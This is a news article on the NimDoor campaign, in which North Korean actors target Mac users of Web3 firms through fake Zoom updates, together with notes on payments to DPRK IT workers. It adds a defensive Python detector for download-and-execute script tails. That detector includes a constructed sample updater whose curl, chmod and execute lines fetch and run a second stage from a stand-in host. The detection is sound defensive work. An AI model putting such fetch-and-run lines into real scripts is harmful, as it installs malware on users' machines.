Be Careful! North Korean Hackers Target Mac Users in a Very Creative Way

SentinelLabs, the research and threat intelligence division of cybersecurity company SentinelOne, has investigated a new and sophisticated attack campaign, named NimDoor, in which North Korean threat actors target macOS devices. The campaign uses the Nim programming language to deploy multiple attack vectors against devices used by small Web3 businesses, a recent trend. The self-described investigator ZachXBT has also uncovered a series of payments made to South Korean IT staff who may be part of this skilled hacking group.

How was the attack carried out?

SentinelLabs' detailed report describes a novel and complex method for compromising Mac devices. It starts in a familiar way: the attacker impersonates a trusted contact to schedule a meeting via Calendly, after which the target receives an email asking them to update the Zoom application. The update script ends with three lines of malicious code that retrieve and execute a second-stage script from an attacker-controlled server before handing off to the legitimate Zoom meeting link. Clicking the link automatically downloads two Mac binaries, which start two independent execution chains: the first file erases general system information and application-specific data, while the second ensures that the attacker keeps long-term access to the affected machine.

The attack chain then continues with the Trojan installing two Bash scripts. One targets data from specific browsers: Arc, Brave, Firefox, Chrome, and Edge. The other steals encrypted data from Telegram together with the blob used to decrypt that data. The extracted data is then sent to an attacker-controlled server. What makes this approach unique and challenging for security analysts is the use of multiple malware components and various techniques to deliver and disguise the malware, which makes detection very difficult.
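The delivery step described above hinges on a lookalike "update" script whose last few lines fetch and run a second stage. The following Python script is an added example, not code from the original article or from SentinelLabs, showing how a defender could triage such scripts before they run: it inspects the tail of a shell script for the download-and-execute idiom. The regular expressions, the function names, and both sample scripts are constructed for this example and are not indicators from the report.

```python
import re
from typing import List, Tuple

# Heuristic patterns for the download-and-execute idiom in POSIX shell.
# These are assumptions made for this example, not indicators from the report.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b.*?https?://\S+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
EXEC_RE = re.compile(
    r"(?:^|[;&|]\s*)(?:sudo\s+)?(?:(?:ba|z)?sh|chmod\s+\+x|osascript)\b"
)


def classify_line(line: str) -> List[str]:
    """Return the suspicious traits found on one non-comment script line."""
    traits: List[str] = []
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return traits
    if FETCH_RE.search(stripped):
        traits.append("remote-fetch")
    if PIPE_TO_SHELL_RE.search(stripped):
        traits.append("pipe-to-shell")
    elif EXEC_RE.search(stripped):
        traits.append("exec")
    return traits


def find_download_and_execute(script: str, tail_lines: int = 3) -> List[Tuple[int, List[str]]]:
    """Scan the last `tail_lines` non-empty, non-comment lines of a script.

    Returns (1-indexed line number, traits) for every flagged line, so an
    analyst can see exactly which trailing lines fetch or execute content.
    """
    indexed = [
        (number, text)
        for number, text in enumerate(script.splitlines(), start=1)
        if text.strip() and not text.strip().startswith("#")
    ]
    flagged = []
    for number, text in indexed[-tail_lines:]:
        traits = classify_line(text)
        if traits:
            flagged.append((number, traits))
    return flagged


def is_staged_loader(script: str, tail_lines: int = 3) -> bool:
    """True when the script tail both fetches remote content and executes something."""
    traits = {t for _, ts in find_download_and_execute(script, tail_lines) for t in ts}
    return "remote-fetch" in traits and ("pipe-to-shell" in traits or "exec" in traits)


# Constructed benign updater (sample input for this example).
BENIGN_SCRIPT = """#!/bin/bash
# Constructed benign updater for this example
echo "Checking Zoom version..."
defaults read /Applications/zoom.us.app/Contents/Info.plist CFBundleShortVersionString
echo "Zoom is up to date."
"""

# Constructed lookalike updater (sample input for this example, not a real sample):
# the tail fetches a second stage, runs it, then opens a meeting link.
STAGED_SCRIPT = """#!/bin/bash
# Constructed lookalike updater for this example
echo "Checking Zoom version..."
echo "Updating Zoom..."
curl -s -o /tmp/.zoom_update https://update.example.invalid/stage2
chmod +x /tmp/.zoom_update && /tmp/.zoom_update
open "https://zoom.us/j/0000000000"
"""

if __name__ == "__main__":
    for name, script in (("benign", BENIGN_SCRIPT), ("staged", STAGED_SCRIPT)):
        print(name, is_staged_loader(script), find_download_and_execute(script))
```

The check is deliberately narrow: it only reports a script whose tail both reaches out to a URL and executes something, which keeps ordinary version-check scripts out of the alert queue while still catching the "three trailing lines" pattern the report describes. Anything flagged should be detonated or reviewed by hand rather than blocked on the regex result alone.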
Tracking the money

ZachXBT, an anonymous blockchain investigator, recently posted on X his latest findings about large payments made to several developers from the Democratic People's Republic of Korea (DPRK) who have been working on various projects since the beginning of the year. He identified eight workers employed by 12 different companies. His findings indicate that 2.76 million USDC has been sent each month from Circle accounts to addresses linked to the developers. These addresses sit very close to an address that Tether blacklisted in 2023 because of its link to the alleged mastermind Sim Hyon Sop. Zach continues to monitor similar address clusters, but has not publicly disclosed any information because they are still active. He warned that once these workers take ownership of a contract, the underlying project is at high risk. "I believe that when a group hires many DPRK ITW (IT staff), it is a reasonable indicator that the startup will fail. Unlike other threats to the industry, these employees have little sophistication, so they are mainly a result of the carelessness of the group itself."
